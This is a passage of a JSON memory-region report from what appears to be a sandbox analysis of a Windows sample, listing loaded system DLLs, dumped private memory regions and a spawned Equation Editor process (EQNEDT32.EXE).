"region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 180224, "start_va": 1900740608, "type": "region", "version": 1 }, "end_va": 1900920831, "entry_point": 1900740608, "filename": "\\Windows\\System32\\d3d10_1.dll", "id": "region_265", "name": "d3d10_1.dll", "norm_filename": "c:\\windows\\system32\\d3d10_1.dll", "region_type": "memory_mapped_file", "start_va": 1900740608, "timestamp": "00:00:15.130", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 323584, "start_va": 1902772224, "type": "region", "version": 1 }, "end_va": 1903095807, "entry_point": 1902772224, "filename": "\\Windows\\System32\\webio.dll", "id": "region_266", "name": "webio.dll", "norm_filename": "c:\\windows\\system32\\webio.dll", "region_type": "memory_mapped_file", "start_va": 1902772224, "timestamp": "00:00:15.131", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 360448, "start_va": 1903099904, "type": "region", "version": 1 }, "end_va": 1903460351, "entry_point": 1903099904, "filename": "\\Windows\\System32\\winhttp.dll", "id": "region_267", "name": "winhttp.dll", "norm_filename": "c:\\windows\\system32\\winhttp.dll", "region_type": "memory_mapped_file", "start_va": 1903099904, "timestamp": "00:00:15.131", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1907425280, "type": "region", "version": 1 }, "end_va": 1907445759, "entry_point": 1907425280, "filename": "\\Windows\\System32\\msimg32.dll", "id": "region_268", "name": "msimg32.dll", "norm_filename": "c:\\windows\\system32\\msimg32.dll", "region_type": "memory_mapped_file", "start_va": 1907425280, "timestamp": "00:00:15.132", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 135168, "start_va": 1937702912, "type": "region", "version": 1 }, "end_va": 1937838079, "entry_point": 1937702912, "filename": "\\Windows\\System32\\ntmarta.dll", "id": "region_269", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\system32\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 1937702912, "timestamp": "00:00:15.132", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1940389888, "type": "region", "version": 1 }, "end_va": 1940443135, "entry_point": 1940389888, "filename": "\\Windows\\System32\\wtsapi32.dll", "id": "region_270", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\system32\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1940389888, "timestamp": "00:00:15.133", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1028096, "start_va": 1940520960, "type": "region", "version": 1 }, "end_va": 1941549055, "entry_point": 1940520960, "filename": "\\Windows\\System32\\WindowsCodecs.dll", "id": "region_271", "name": "windowscodecs.dll", "norm_filename": "c:\\windows\\system32\\windowscodecs.dll", "region_type": "memory_mapped_file", "start_va": 1940520960, "timestamp": "00:00:15.134", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 77824, "start_va": 1941766144, "type": "region", "version": 1 }, "end_va": 1941843967, "entry_point": 1941766144, "filename": "\\Windows\\System32\\dwmapi.dll", "id": "region_272", "name": "dwmapi.dll", "norm_filename": "c:\\windows\\system32\\dwmapi.dll", "region_type": "memory_mapped_file", "start_va": 1941766144, "timestamp": "00:00:15.148", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1638400, "start_va": 1943470080, "type": "region", "version": 1 }, "end_va": 1945108479, "entry_point": 1943470080, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll", "id": "region_273", "name": "gdiplus.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll", "region_type": "memory_mapped_file", "start_va": 1943470080, "timestamp": "00:00:15.148", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 262144, "start_va": 1945108480, "type": "region", "version": 1 }, "end_va": 1945370623, "entry_point": 1945108480, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_274", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1945108480, "timestamp": "00:00:15.152", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1945370624, "type": "region", "version": 1 }, "end_va": 1946374143, "entry_point": 1945370624, "filename": "\\Windows\\System32\\propsys.dll", "id": "region_275", "name": "propsys.dll", "norm_filename": "c:\\windows\\system32\\propsys.dll", "region_type": "memory_mapped_file", "start_va": 1945370624, "timestamp": "00:00:15.153", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1946681344, "type": "region", "version": 1 }, "end_va": 1948377087, "entry_point": 1946681344, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "id": "region_276", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1946681344, "timestamp": "00:00:15.181", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1952382976, "type": "region", "version": 1 }, "end_va": 1952419839, "entry_point": 1952382976, "filename": "\\Windows\\System32\\version.dll", "id": "region_277", "name": "version.dll", "norm_filename": "c:\\windows\\system32\\version.dll", "region_type": "memory_mapped_file", "start_va": 1952382976, "timestamp": "00:00:15.183", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1955659776, "type": "region", "version": 1 }, "end_va": 1955901439, "entry_point": 1955659776, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_278", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1955659776, "timestamp": "00:00:15.184", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1958150144, "type": "region", "version": 1 }, "end_va": 1958240255, "entry_point": 1958150144, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_279", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1958150144, "timestamp": "00:00:15.184", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1962606592, "type": "region", "version": 1 }, "end_va": 1962639359, "entry_point": 1962606592, "filename": "\\Windows\\System32\\secur32.dll", "id": "region_280", "name": "secur32.dll", "norm_filename": "c:\\windows\\system32\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1962606592, "timestamp": "00:00:15.185", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 110592, "start_va": 1962737664, "type": "region", "version": 1 }, "end_va": 1962848255, "entry_point": 1962737664, "filename": "\\Windows\\System32\\sspicli.dll", "id": "region_281", "name": "sspicli.dll", "norm_filename": "c:\\windows\\system32\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1962737664, "timestamp": "00:00:15.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1962868736, "type": "region", "version": 1 }, "end_va": 1962917887, "entry_point": 1962868736, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_282", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1962868736, "timestamp": "00:00:15.187", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 167936, "start_va": 1963327488, "type": "region", "version": 1 }, "end_va": 1963495423, "entry_point": 1963327488, "filename": "\\Windows\\System32\\winsta.dll", "id": "region_283", "name": "winsta.dll", "norm_filename": "c:\\windows\\system32\\winsta.dll", "region_type": "memory_mapped_file", "start_va": 1963327488, "timestamp": "00:00:15.188", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1963524096, "type": "region", "version": 1 }, "end_va": 1963581439, "entry_point": 1963524096, "filename": "\\Windows\\System32\\RpcRtRemote.dll", "id": "region_284", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\system32\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1963524096, "timestamp": "00:00:15.206", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1963589632, "type": "region", "version": 1 }, "end_va": 1963634687, "entry_point": 1963589632, "filename": "\\Windows\\System32\\profapi.dll", "id": "region_285", "name": "profapi.dll", "norm_filename": "c:\\windows\\system32\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 1963589632, "timestamp": "00:00:15.207", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000333-addr_0x0000000000700000-size_0x0000000000004000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_9", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 16384, "start_va": 7340032, "type": "region", "version": 1 }, "end_va": 7356415, "entry_point": 0, "filename": null, "id": "region_333", "name": "private_0x0000000000700000", "norm_filename": null, "region_type": "private_memory", "start_va": 7340032, "timestamp": "00:00:22.234", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000335-addr_0x0000000000730000-size_0x000000000001f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_10", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 126976, "start_va": 7536640, "type": "region", "version": 1 }, "end_va": 7663615, "entry_point": 0, "filename": null, "id": "region_335", "name": "private_0x0000000000730000", "norm_filename": null, "region_type": "private_memory", "start_va": 7536640, "timestamp": "00:00:22.235", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000336-addr_0x0000000000750000-size_0x000000000001f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_11", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 126976, "start_va": 7667712, "type": "region", "version": 1 }, "end_va": 7794687, "entry_point": 0, "filename": null, "id": "region_336", "name": "private_0x0000000000750000", "norm_filename": null, "region_type": "private_memory", "start_va": 7667712, "timestamp": "00:00:22.235", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000338-addr_0x0000000000ef0000-size_0x000000000001f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_12", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 126976, "start_va": 15663104, "type": "region", "version": 1 }, "end_va": 15790079, "entry_point": 0, "filename": null, "id": "region_338", "name": "private_0x0000000000ef0000", "norm_filename": null, "region_type": "private_memory", "start_va": 15663104, "timestamp": "00:00:22.235", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000339-addr_0x0000000000f10000-size_0x000000000001f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_13", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 126976, "start_va": 15794176, "type": "region", "version": 1 }, "end_va": 15921151, "entry_point": 0, "filename": null, "id": "region_339", "name": "private_0x0000000000f10000", "norm_filename": null, "region_type": "private_memory", "start_va": 15794176, "timestamp": "00:00:22.236", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000341-addr_0x0000000002110000-size_0x000000000001f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_14", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 126976, "start_va": 34668544, "type": "region", "version": 1 }, "end_va": 34795519, "entry_point": 0, "filename": null, "id": "region_341", "name": "private_0x0000000002110000", "norm_filename": null, "region_type": "private_memory", "start_va": 34668544, "timestamp": "00:00:22.236", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000342-addr_0x0000000002130000-size_0x000000000001f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_15", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 126976, "start_va": 34799616, "type": "region", "version": 1 }, "end_va": 34926591, "entry_point": 0, "filename": null, "id": "region_342", "name": "private_0x0000000002130000", "norm_filename": null, "region_type": "private_memory", "start_va": 34799616, "timestamp": "00:00:22.236", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000343-addr_0x0000000002180000-size_0x000000000001f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_16", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 126976, "start_va": 35127296, "type": "region", "version": 1 }, "end_va": 35254271, "entry_point": 0, "filename": null, "id": "region_343", "name": "private_0x0000000002180000", "norm_filename": null, "region_type": "private_memory", "start_va": 35127296, "timestamp": "00:00:22.237", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000344-addr_0x00000000021c0000-size_0x000000000001f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_17", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 126976, "start_va": 35389440, "type": "region", "version": 1 }, "end_va": 35516415, "entry_point": 0, "filename": null, "id": "region_344", "name": "private_0x00000000021c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 35389440, "timestamp": "00:00:22.237", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000345-addr_0x00000000021e0000-size_0x000000000001e000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_18", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 122880, "start_va": 35520512, "type": "region", "version": 1 }, "end_va": 35643391, "entry_point": 0, "filename": null, "id": "region_345", "name": "private_0x00000000021e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 35520512, "timestamp": "00:00:22.237", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000346-addr_0x0000000002270000-size_0x000000000001e000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_19", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 122880, "start_va": 36110336, "type": "region", "version": 1 }, "end_va": 36233215, "entry_point": 0, "filename": null, "id": "region_346", "name": "private_0x0000000002270000", "norm_filename": null, "region_type": "private_memory", "start_va": 36110336, "timestamp": "00:00:22.238", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000347-addr_0x0000000002670000-size_0x0000000000021000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_20", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 135168, "start_va": 40304640, "type": "region", "version": 1 }, "end_va": 40439807, "entry_point": 0, "filename": null, "id": "region_347", "name": "private_0x0000000002670000", "norm_filename": null, "region_type": "private_memory", "start_va": 40304640, "timestamp": "00:00:22.238", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000709-addr_0x00000000081d0000-size_0x00000000004b2000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_90", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4923392, "start_va": 136118272, "type": "region", "version": 1 }, "end_va": 141041663, "entry_point": 0, "filename": null, "id": "region_709", "name": "private_0x00000000081d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 136118272, "timestamp": "00:00:30.098", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000718-addr_0x0000000003510000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_91", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 55640064, "type": "region", "version": 1 }, "end_va": 55644159, "entry_point": 0, "filename": null, "id": "region_718", "name": "private_0x0000000003510000", "norm_filename": null, "region_type": "private_memory", "start_va": 55640064, "timestamp": "00:00:31.803", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000720-addr_0x0000000003570000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_92", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 56033280, "type": "region", "version": 1 }, "end_va": 56041471, "entry_point": 0, "filename": null, "id": "region_720", "name": "private_0x0000000003570000", "norm_filename": null, "region_type": "private_memory", "start_va": 56033280, "timestamp": "00:00:31.804", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000721-addr_0x0000000003580000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_93", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 56098816, "type": "region", "version": 1 }, "end_va": 56102911, "entry_point": 0, "filename": null, "id": "region_721", "name": "private_0x0000000003580000", "norm_filename": null, "region_type": "private_memory", "start_va": 56098816, "timestamp": "00:00:31.804", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000722-addr_0x0000000003590000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_94", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 56164352, "type": "region", "version": 1 }, "end_va": 56172543, "entry_point": 0, "filename": null, "id": "region_722", "name": "private_0x0000000003590000", "norm_filename": null, "region_type": "private_memory", "start_va": 56164352, "timestamp": "00:00:31.804", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000724-addr_0x00000000035b0000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_95", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 56295424, "type": "region", "version": 1 }, "end_va": 56303615, "entry_point": 0, "filename": null, "id": "region_724", "name": "private_0x00000000035b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 56295424, "timestamp": "00:00:31.805", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000726-addr_0x00000000036e0000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_96", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 57540608, "type": "region", "version": 1 }, "end_va": 57548799, "entry_point": 0, "filename": null, "id": "region_726", "name": "private_0x00000000036e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 57540608, "timestamp": "00:00:31.806", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000728-addr_0x0000000003700000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_97", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 57671680, "type": "region", "version": 1 }, "end_va": 57679871, "entry_point": 0, "filename": null, "id": "region_728", "name": "private_0x0000000003700000", "norm_filename": null, "region_type": "private_memory", "start_va": 57671680, "timestamp": "00:00:31.806", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000735-addr_0x0000000000730000-size_0x0000000000031000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_98", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 200704, "start_va": 7536640, "type": "region", "version": 1 }, "end_va": 7737343, "entry_point": 0, "filename": null, "id": "region_735", "name": "private_0x0000000000730000", "norm_filename": null, "region_type": "private_memory", "start_va": 7536640, "timestamp": "00:00:33.689", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000741-addr_0x0000000007230000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_99", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 119734272, "type": "region", "version": 1 }, "end_va": 120782847, "entry_point": 0, "filename": null, "id": "region_741", "name": "private_0x0000000007230000", "norm_filename": null, "region_type": "private_memory", "start_va": 119734272, "timestamp": "00:00:33.691", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000745-addr_0x000000007ffdc000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_100", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147336192, "type": "region", "version": 1 }, "end_va": 2147340287, "entry_point": 0, "filename": null, "id": "region_745", "name": "private_0x000000007ffdc000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147336192, "timestamp": "00:00:33.693", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000759-addr_0x0000000007490000-size_0x0000000000100000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_101", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 122224640, "type": "region", "version": 1 }, "end_va": 123273215, "entry_point": 0, "filename": null, "id": "region_759", "name": "private_0x0000000007490000", "norm_filename": null, "region_type": "private_memory", "start_va": 122224640, "timestamp": "00:00:39.843", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000760-addr_0x0000000009460000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_102", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 155582464, "type": "region", "version": 1 }, "end_va": 155647999, "entry_point": 0, "filename": null, "id": "region_760", "name": "private_0x0000000009460000", "norm_filename": null, "region_type": "private_memory", "start_va": 155582464, "timestamp": "00:00:39.843", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE\" -Embedding", "filename": "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe", "id": "proc_2", "image_name": "eqnedt32.exe", "monitor_reason": "rpc_server", "monitored_id": 2, "origin_monitor_id": 1, "ref_parent_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000002-region_00000352-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_21", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_352", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:22.539", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000353-addr_0x0000000000030000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_22", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 1245183, "entry_point": 0, "filename": null, "id": "region_353", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:00:22.539", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1261567, "entry_point": 0, "filename": null, "id": "region_354", "name": "pagefile_0x0000000000130000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1245184, "timestamp": "00:00:22.539", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1314815, "entry_point": 0, "filename": null, "id": "region_355", "name": "pagefile_0x0000000000140000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1310720, "timestamp": "00:00:22.539", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 581632, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4775935, "entry_point": 4194304, "filename": "\\Program Files\\Common Files\\microsoft shared\\EQUATION\\EQNEDT32.EXE", "id": "region_356", "name": "eqnedt32.exe", "norm_filename": "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe", "region_type": "memory_mapped_file", "start_va": 4194304, "timestamp": "00:00:22.539", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1995767808, "type": "region", "version": 1 }, "end_va": 1997062143, "entry_point": 1995767808, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_357", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1995767808, "timestamp": "00:00:22.728", "type": "region", "version": 1 }, { "dump": { 